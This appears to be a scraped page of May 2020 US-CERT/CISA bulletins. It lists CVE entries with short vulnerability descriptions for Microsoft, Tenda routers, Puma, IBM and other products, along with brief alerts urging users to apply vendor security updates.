  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1188
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists in the Windows implementation of Transport Layer Security (TLS) when it improperly handles certain key exchanges, aka 'Microsoft Windows Transport Layer Security Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1118
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1090
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists when Connected User Experiences and Telemetry Service fails to validate certain function values. An attacker who successfully exploited this vulnerability could deny dependent security feature functionality. To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service validates certain function values, aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1123. 2020-05-21 not yet calculated CVE-2020-1084
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1021, CVE-2020-1088. 2020-05-21 not yet calculated CVE-2020-1082
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when the Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle objects in memory, aka 'Windows CSRSS Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1116
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1077
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158. 2020-05-21 not yet calculated CVE-2020-1164
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1072
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1112
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when Windows improperly handles errors tied to Remote Access Common Dialog, aka 'Windows Remote Access Common Dialog Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1071
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1048. 2020-05-21 not yet calculated CVE-2020-1070
MISC microsoft -- multiple_windows_products
  A cross-site-scripting (XSS) vulnerability exists when Active Directory Federation Services (ADFS) does not properly sanitize user inputs, aka 'Microsoft Active Directory Federation Services Cross-Site Scripting Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1055
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143. 2020-05-21 not yet calculated CVE-2020-1054
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1070. 2020-05-21 not yet calculated CVE-2020-1048
MISC microsoft -- multiple_windows_products
  A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1126, CVE-2020-1136, CVE-2020-1150. 2020-05-21 not yet calculated CVE-2020-1028
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1082, CVE-2020-1088. 2020-05-21 not yet calculated CVE-2020-1021
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1186
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists when Hyper-V on a Windows Server fails to properly handle specially crafted network packets. To exploit the vulnerability, an attacker would send specially crafted network packets to the Hyper-V Server. The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to properly handle these network packets, aka 'Windows Hyper-V Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-0909
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1110. 2020-05-21 not yet calculated CVE-2020-1109
MISC microsoft -- power_bi_report_server
  A spoofing vulnerability exists in Microsoft Power BI Report Server in the way it validates the content-type of uploaded attachments, aka 'Microsoft Power BI Report Server Spoofing Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1173
MISC microsoft -- sharepoint_enterprise_server_2016_and_sharepoint_foundation_2013_service_pack
  A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1104, CVE-2020-1107. 2020-05-21 not yet calculated CVE-2020-1105
MISC microsoft -- sharepoint_enterprise_server_2016_and_sharepoint_server_2019
  A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1024. 2020-05-21 not yet calculated CVE-2020-1102
MISC microsoft -- visual_studio_code
  A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads workspace settings from a notebook file, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1171. 2020-05-21 not yet calculated CVE-2020-1192
MISC microsoft -- visual_studio_code
  A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads configuration files after opening a project, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1192. 2020-05-21 not yet calculated CVE-2020-1171
MISC microsoft -- windows_10_and_windows_server
  An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1141, CVE-2020-1179. 2020-05-21 not yet calculated CVE-2020-1145
MISC microsoft -- windows_10_and_windows_server
  An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1121, CVE-2020-1165. 2020-05-21 not yet calculated CVE-2020-1166
MISC microsoft -- windows_10_and_windows_server
  An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1121, CVE-2020-1166. 2020-05-21 not yet calculated CVE-2020-1165
MISC microsoft -- windows_7_and_windows_server_2008_r2
  A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1126, CVE-2020-1136. 2020-05-21 not yet calculated CVE-2020-1150
MISC monstra -- monstra_cms
  Monstra CMS 3.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via admin/index.php?id=filesmanager because, for example, .php filenames are blocked but .php7 filenames are not, a related issue to CVE-2017-18048. 2020-05-22 not yet calculated CVE-2020-13384
MISC mozilla -- thunderbird
  By encoding Unicode whitespace characters within the From email header, an attacker can spoof the sender email address that Thunderbird displays. This vulnerability affects Thunderbird < 68.8.0. 2020-05-22 not yet calculated CVE-2020-12397
MISC
MISC netapp -- element_os_and_element_healthtools
  Element OS prior to version 12.0 and Element HealthTools prior to version 2020.04.01.04 are susceptible to a vulnerability which when successfully exploited could lead to disclosure of sensitive information. 2020-05-21 not yet calculated CVE-2020-8572
MISC ocproducts -- composr_cms
  Composr 10.0.30 allows Persistent XSS via a Usergroup name under the Security configuration. 2020-05-22 not yet calculated CVE-2020-8789
MISC
FULLDISC puma_gem_for_ruby_on_rails -- puma_gem_for_ruby_on_rails
  In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but different vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5. 2020-05-22 not yet calculated CVE-2020-11077
MISC
CONFIRM puma_gem_for_ruby_on_rails -- puma_gem_for_ruby_on_rails
  In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4. 2020-05-22 not yet calculated CVE-2020-11076
MISC
MISC
CONFIRM python -- python
  An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used. 2020-05-22 not yet calculated CVE-2020-13388
MISC schedmd -- slurm
  Slurm 19.05.x before 19.05.7 and 20.02.x before 20.02.3, in the rare case where Message Aggregation is enabled, allows Authentication Bypass via an Alternate Path or Channel. A race condition allows a user to launch a process as an arbitrary user. 2020-05-21 not yet calculated CVE-2020-12693
CONFIRM
CONFIRM splashtop -- streamer_and_business
  A Windows privilege change issue was discovered in Splashtop Software Updater before 1.5.6.16. Insecure permissions on the configuration file and named pipe allow for local privilege escalation to NT AUTHORITY/SYSTEM, by forcing a permission change to any Splashtop files and directories, with resultant DLL hijacking. This product is bundled with Splashtop Streamer (before 3.3.8.0) and Splashtop Business (before 3.3.8.0). 2020-05-21 not yet calculated CVE-2020-12431
MISC
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/addressNat entrys and mitInterface parameters for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13390
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetSpeedWan speed_dir parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13391
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/openSchedWifi schedStartTime and schedEndTime parameters for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13389
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/SetNetControlList list parameter for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13394
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/saveParentControlInfo deviceId and time parameters for a POST request, a value is directly used in a strcpy to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13393
MISC tenda -- multiple_routers
  An issue was discovered on Tenda AC6 V1.0 V15.03.05.19_multi_TD01, AC9 V1.0 V15.03.05.19(6318)_CN, AC9 V3.0 V15.03.06.42_multi, AC15 V1.0 V15.03.05.19_multi_TD01, and AC18 V15.03.05.19(6318_)_CN devices. There is a buffer overflow vulnerability in the router's web server -- httpd. While processing the /goform/setcfm funcpara1 parameter for a POST request, a value is directly used in a sprintf to a local variable placed on the stack, which overwrites the return address of a function. An attacker can construct a payload to carry out arbitrary code execution attacks. 2020-05-22 not yet calculated CVE-2020-13392
MISC trackr -- trackr_devices
  TrackR devices through 2020-05-06 allow attackers to trigger the Beep (aka alarm) feature, which will eventually cause a denial of service when battery capacity is exhausted. 2020-05-23 not yet calculated CVE-2020-13425
MISC

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: LATEST ALERT

Microsoft Releases Security Update for Edge

US-CERT All NCAS Products - Fri, 05/22/2020 - 14:10
Original release date: May 22, 2020

Microsoft has released a security update to address a vulnerability in Edge (Chromium-based). A remote attacker could exploit this vulnerability to write files to arbitrary locations and gain elevated privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s Security Advisory for CVE-2020-1195 and apply the necessary update.

Cisco Releases Security Updates

US-CERT All NCAS Products - Fri, 05/22/2020 - 14:05
Original release date: May 22, 2020

Cisco has released security updates to address vulnerabilities in Unified CCX software and Prime Network Registrar. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

For updates addressing lower severity vulnerabilities see the Cisco Security Advisories page.

ACSC Releases Cyber Criminal and APT Tradecraft Trends for 2019-2020

US-CERT All NCAS Products - Fri, 05/22/2020 - 14:04
Original release date: May 22, 2020

The Australian Cyber Security Centre (ACSC) has released a summary of trends for 2019-2020 outlining tactics, techniques, and procedures (TTPs) used by cyber criminals and advanced persistent threat (APT) groups to target Australian networks. ACSC uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework to identify notable adversary TTPs.  

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review ACSC’s Summary of Tradecraft Trends for 2019-20: Tactics, Techniques and Procedures Used to Target Australian Networks and MITRE’s ATT&CK for Enterprise framework for more information.

CISA, DOE, and UK’s NCSC Issue Guidance on Protecting Industrial Control Systems

US-CERT All NCAS Products - Fri, 05/22/2020 - 13:08
Original release date: May 22, 2020

The Cybersecurity and Infrastructure Security Agency (CISA), the Department of Energy (DOE), and the UK's National Cyber Security Centre (NCSC) have released Cybersecurity Best Practices for Industrial Control Systems, an infographic providing recommended cybersecurity practices for industrial control systems (ICS). The two-page infographic summarizes common ICS risk considerations, short- and long-term cybersecurity event impacts, best practices to defend ICS processes, and highlights NCSC's product on Secure Design Principles and Operational Technology.

CISA, DOE, and NCSC encourage users to review Cybersecurity Best Practices for Industrial Control Systems. For more in-depth information, visit CISA’s ICS Recommended Practices webpage and DOE's Cybersecurity Capability Maturity Model (C2M2) Program webpage. For information on CISA Assessments, visit https://www.cisa.gov/cyber-resource-hub.

Categories: LATEST ALERT

Drupal Releases Security Updates

US-CERT All NCAS Products - Thu, 05/21/2020 - 14:16
Original release date: May 21, 2020

Drupal has released security updates to address vulnerabilities affecting Drupal 7, 8.7, and 8.8. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Drupal Advisories SA-CORE-2020-002 and SA-CORE-2020-003 for more information and to apply the necessary updates.

Categories: LATEST ALERT

Apple Releases Security Update for Xcode

US-CERT All NCAS Products - Thu, 05/21/2020 - 14:14
Original release date: May 21, 2020

Apple has released a security update to address a vulnerability in Xcode. A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security page for Xcode 11.5 and apply the necessary update.

Categories: LATEST ALERT

CISA, IRS, USSS, and Treasury Release Joint Alert on Scams Related to Coronavirus Economic Impact Payments

US-CERT All NCAS Products - Thu, 05/21/2020 - 14:11
Original release date: May 21, 2020

The Cybersecurity and Infrastructure Security Agency (CISA), U.S. Department of the Treasury, Internal Revenue Service (IRS), and United States Secret Service (USSS) have released a Joint Alert with mitigations to help Americans avoid scams related to coronavirus economic impact payments—particularly attempts to steal payments, personal and financial information, and disrupt payment efforts.

CISA encourages consumers to review the Joint Alert, Avoid Scams Related to Economic Payments, COVID-19, and www.cisa.gov/coronavirus for more information.

Categories: LATEST ALERT

ISC Releases Security Advisory for BIND

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:52
Original release date: May 20, 2020

The Internet Systems Consortium (ISC) has released security advisories that address vulnerabilities affecting multiple versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit these vulnerabilities to cause a denial-of-service condition.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ISC advisories for CVE-2020-8616 and CVE-2020-8617 for more information and to apply the necessary updates.

Categories: LATEST ALERT

Adobe Releases Security Updates

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:49
Original release date: May 20, 2020

Adobe has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates.

Categories: LATEST ALERT

Google Releases Security Updates for Chrome

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:47
Original release date: May 20, 2020

Google has released Chrome version 83.0.4103.61 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release Note and apply the necessary updates.

Categories: LATEST ALERT

VMware Releases Security Update for Cloud Director

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:46
Original release date: May 20, 2020

VMware has released security updates to address a vulnerability in VMware Cloud Director (formerly known as vCloud Director). A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the VMware Security Advisory and apply the necessary updates or workaround.

Categories: LATEST ALERT

Microsoft Releases Security Advisory for Windows DNS Servers

US-CERT All NCAS Products - Wed, 05/20/2020 - 14:43
Original release date: May 20, 2020

Microsoft has released a security advisory that addresses a vulnerability affecting Windows DNS Servers. An attacker could exploit this vulnerability to cause a denial-of-service condition.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory ADV200009 for more information and to apply the necessary mitigation or workaround.

Categories: LATEST ALERT

Vulnerability Summary for the Week of May 11, 2020

US-CERT All NCAS Products - Mon, 05/18/2020 - 11:39
Original release date: May 18, 2020


The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Columns: Primary Vendor -- Product; Description; Published; CVSS Score; Source & Patch Info

actionpack_page-caching_gem -- actionpack_page-caching_gem
  There is a vulnerability in actionpack_page-caching gem < v1.2.1 that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view. 2020-05-12 7.5 CVE-2020-8159
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple heap-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. 2020-05-08 7.5 CVE-2020-10638
MISC
MISC
MISC
MISC
MISC
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An improper validation vulnerability exists that could allow an attacker to inject specially crafted input into memory where it can be executed. 2020-05-08 7.5 CVE-2020-12022
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow a low privilege user to overwrite files outside the application’s control. 2020-05-08 7.5 CVE-2020-12006
MISC
MISC
MISC
MISC advantech -- webaccess/scada
  Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. 2020-05-08 7.5 CVE-2020-12002
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC apache -- log4net
  Apache log4net before 2.0.8 does not disable XML external entities when parsing log4net configuration files. This could allow for XXE-based attacks in applications that accept arbitrary configuration files from users. 2020-05-11 7.5 CVE-2018-1285
MISC domainmod -- domainmod
  reset.php in DomainMOD 4.13.0 uses insufficient entropy for password reset requests, leading to account takeover. 2020-05-08 7.5 CVE-2020-12735
MISC freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r360971, 12.1-RELEASE before p5, 11.4-STABLE before r360971, 11.4-BETA1 before p1 and 11.3-RELEASE before p9, libalias does not properly validate packet length resulting in modules causing an out of bounds read/write condition if no checking was built into the module. 2020-05-13 7.5 CVE-2020-7454
MISC
CONFIRM freebsd -- freebsd
  In FreeBSD 12.1-STABLE before r356911, and 12.1-RELEASE before p5, insufficient checking in the cryptodev module allocated the size of a kernel buffer based on a user-supplied length allowing an unprivileged process to trigger a kernel panic. 2020-05-13 7.5 CVE-2019-15880
MISC
CONFIRM freerdp -- freerdp
  libfreerdp/codec/interleaved.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Out-of-bounds Write. 2020-05-15 7.5 CVE-2020-11524
MISC
CONFIRM
CONFIRM freerdp -- freerdp
  libfreerdp/gdi/region.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Integer Overflow. 2020-05-15 7.5 CVE-2020-11523
MISC
CONFIRM
CONFIRM gazie -- gazie
  An issue was discovered in Gazie 7.32. A successful installation does not remove or block (or in any other way prevent use of) its own file /setup/install/setup.php, meaning that anyone can request it without authentication. This file allows arbitrary PHP file inclusion via a hidden_req POST parameter. 2020-05-11 7.5 CVE-2020-12743
CONFIRM glpi_project -- glpi
  In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6. 2020-05-12 9 CVE-2020-11060
MISC
CONFIRM gnuteca -- gnuteca
  Gnuteca 3.8 allows action=main:search:simpleSearch SQL Injection via the exemplaryStatusId parameter. 2020-05-09 7.5 CVE-2020-12766
CONFIRM google -- android
  Airbrush FW's scratch memory allocator is susceptible to numeric overflow. When the overflow occurs, the next allocation could potentially return a pointer within the previous allocation's memory, which could lead to improper memory access. Product: Android. Versions: Android kernel. Android ID: A-135772851 2020-05-14 7.5 CVE-2020-0221
MISC google -- android
  In a2dp_aac_decoder_cleanup of a2dp_aac_decoder.cc, there is a possible invalid free due to memory corruption. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10 Android-9. Android ID: A-148107188 2020-05-14 10 CVE-2020-0103
MISC ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176266 2020-05-14 9.3 CVE-2020-4285
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 180167. 2020-05-14 9.3 CVE-2020-4422
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176269. 2020-05-14 9.3 CVE-2020-4287
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 176270. 2020-05-14 9.3 CVE-2020-4288
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 178244. 2020-05-14 9.3 CVE-2020-4343
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by memory corruption. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 181721. 2020-05-14 9.3 CVE-2020-4467
XF
CONFIRM ibm -- i2_intelligent_analysis_platform
  IBM i2 Intelligent Analysis Platform 9.2.1 could allow a remote attacker to execute arbitrary code on the system, caused by memory corruption. By persuading a victim to open a specially-crafted document, a remote attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the victim or cause the application to crash. IBM X-Force ID: 181723. 2020-05-14 9.3 CVE-2020-4468
XF
CONFIRM iproute2 -- iproute2
  iproute2 before 5.1.0 has a use-after-free in get_netnsid_from_name in ip/ipnetns.c. NOTE: security relevance may be limited to certain uses of setuid that, although not a default, are sometimes a configuration option offered to end users. Even when setuid is used, other factors (such as C library configuration) may block exploitability. 2020-05-09 7.5 CVE-2019-20795
MISC
CONFIRM lg -- multiple_mobile_devices
  An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. Arbitrary code execution can occur via the bootloader. The LG ID is LVE-SMP-200006 (May 2020). 2020-05-11 7.5 CVE-2020-12753
CONFIRM libemf -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows out-of-bounds memory access. 2020-05-11 7.5 CVE-2020-11865
MISC
MISC
MISC libemf -- libemf
  libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows a use-after-free. 2020-05-11 7.5 CVE-2020-11866
MISC
MISC
MISC libexif -- libexif
  exif_entry_get_value in exif-entry.c in libexif 0.6.21 has a divide-by-zero error. 2020-05-09 7.5 CVE-2020-12767
CONFIRM
MLIST openconnect_project -- openconnect_vpn_client
  OpenConnect 8.09 has a buffer overflow, causing a denial of service (application crash) or possibly unspecified other impact, via crafted certificate data to get_cert_name in gnutls.c. 2020-05-12 7.5 CVE-2020-12823
MISC
